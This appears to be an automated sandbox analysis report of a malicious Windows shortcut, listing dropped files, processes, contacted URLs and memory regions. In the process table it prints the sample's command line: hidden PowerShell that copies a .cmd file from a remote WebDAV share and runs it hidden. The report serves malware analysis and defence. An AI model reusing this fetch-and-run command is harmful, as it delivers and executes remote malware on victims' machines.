Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
dial.Ink.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments,
Icon number=1, Archive, ctime=Fri Feb 2 17:37:06 2018, mtime=Fri Feb 2 17:37:12 2018, atime=Fri Feb 2 17:37:06 2018, length=446976,
window=hide
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mv0qmzrk.501.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onjs4n52.opd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2804a3e5b8dbc00e.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5AWJ7F37PPXN24YVKTUG.temp
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\new.cmd'
\"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\new.cmd\" -WindowStyle Hidden"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 3 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
224E8872000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34784000
|
trusted library allocation
|
page read and write
|
||
|
224E6B20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34783000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
224E5095000
|
heap
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
224FF0D7000
|
heap
|
page read and write
|
||
|
7FFD3483C000
|
trusted library allocation
|
page execute and read and write
|
||
|
96B5ABE000
|
stack
|
page read and write
|
||
|
224E6AF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3493A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
224FF18D000
|
heap
|
page read and write
|
||
|
96B567E000
|
stack
|
page read and write
|
||
|
96B5CBF000
|
stack
|
page read and write
|
||
|
224E4FF0000
|
heap
|
page read and write
|
||
|
96B688F000
|
stack
|
page read and write
|
||
|
224E4FA0000
|
heap
|
page read and write
|
||
|
224FF3B0000
|
heap
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
224E4F30000
|
heap
|
page read and write
|
||
|
7FFD3478D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34782000
|
trusted library allocation
|
page read and write
|
||
|
224E87CF000
|
trusted library allocation
|
page read and write
|
||
|
96B5EBC000
|
stack
|
page read and write
|
||
|
96B57FE000
|
stack
|
page read and write
|
||
|
224F7140000
|
trusted library allocation
|
page read and write
|
||
|
224E509B000
|
heap
|
page read and write
|
||
|
224FF3BE000
|
heap
|
page read and write
|
||
|
224F6F91000
|
trusted library allocation
|
page read and write
|
||
|
224E50DD000
|
heap
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
224FF2B0000
|
heap
|
page read and write
|
||
|
224E6F20000
|
heap
|
page execute and read and write
|
||
|
224E5029000
|
heap
|
page read and write
|
||
|
7FFD34962000
|
trusted library allocation
|
page read and write
|
||
|
224E8BBC000
|
trusted library allocation
|
page read and write
|
||
|
96B5DBE000
|
stack
|
page read and write
|
||
|
7FFD347DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
96B5BB8000
|
stack
|
page read and write
|
||
|
224FF0A0000
|
heap
|
page read and write
|
||
|
224E4F60000
|
heap
|
page read and write
|
||
|
224FF41A000
|
heap
|
page read and write
|
||
|
224E4FC0000
|
heap
|
page read and write
|
||
|
224E6B40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
224E8817000
|
trusted library allocation
|
page read and write
|
||
|
224E8962000
|
trusted library allocation
|
page read and write
|
||
|
224FF152000
|
heap
|
page read and write
|
||
|
224E87CD000
|
trusted library allocation
|
page read and write
|
||
|
224E5295000
|
heap
|
page read and write
|
||
|
7FFD34836000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34866000
|
trusted library allocation
|
page execute and read and write
|
||
|
96B5E3E000
|
stack
|
page read and write
|
||
|
224E6EE0000
|
trusted library allocation
|
page read and write
|
||
|
96B5355000
|
stack
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
96B577D000
|
stack
|
page read and write
|
||
|
224E6B60000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
224E856B000
|
trusted library allocation
|
page read and write
|
||
|
224E5075000
|
heap
|
page read and write
|
||
|
224FF250000
|
heap
|
page execute and read and write
|
||
|
224E6F91000
|
trusted library allocation
|
page read and write
|
||
|
224FF2A0000
|
heap
|
page execute and read and write
|
||
|
224E701A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34931000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
96B587B000
|
stack
|
page read and write
|
||
|
224E87EC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
224FF411000
|
heap
|
page read and write
|
||
|
224F6FA0000
|
trusted library allocation
|
page read and write
|
||
|
224E6B30000
|
heap
|
page readonly
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
|
224E6F80000
|
heap
|
page read and write
|
||
|
224E4F40000
|
heap
|
page read and write
|
||
|
224E4FC5000
|
heap
|
page read and write
|
||
|
224E7BC3000
|
trusted library allocation
|
page read and write
|
||
|
96B59FD000
|
stack
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
224FF2A7000
|
heap
|
page execute and read and write
|
||
|
224F6FFE000
|
trusted library allocation
|
page read and write
|
||
|
224E5290000
|
heap
|
page read and write
|
||
|
224E50AF000
|
heap
|
page read and write
|
||
|
96B5D3E000
|
stack
|
page read and write
|
||
|
224E50D7000
|
heap
|
page read and write
|
||
|
224E8111000
|
trusted library allocation
|
page read and write
|
||
|
224E50D9000
|
heap
|
page read and write
|
||
|
224E8AF6000
|
trusted library allocation
|
page read and write
|
||
|
224FF112000
|
heap
|
page read and write
|
||
|
96B5C3C000
|
stack
|
page read and write
|
||
|
7FFD3479B000
|
trusted library allocation
|
page read and write
|
||
|
224FF3BA000
|
heap
|
page read and write
|
||
|
224E8BC0000
|
trusted library allocation
|
page read and write
|
||
|
96B53DE000
|
stack
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
224E508F000
|
heap
|
page read and write
|
||
|
224E85E1000
|
trusted library allocation
|
page read and write
|
||
|
224FF2D0000
|
heap
|
page read and write
|
||
|
224FEF9C000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
|
224E71C3000
|
trusted library allocation
|
page read and write
|
||
|
224F700A000
|
trusted library allocation
|
page read and write
|
||
|
224E6EE3000
|
trusted library allocation
|
page read and write
|
||
|
96B5B37000
|
stack
|
page read and write
|
||
|
224FF186000
|
heap
|
page read and write
|
||
|
96B597E000
|
stack
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
96B5A78000
|
stack
|
page read and write
|
||
|
224E8960000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
96B56FD000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
96B58FF000
|
stack
|
page read and write
|
||
|
7DF430880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
There are 121 hidden memdumps, click here to show them.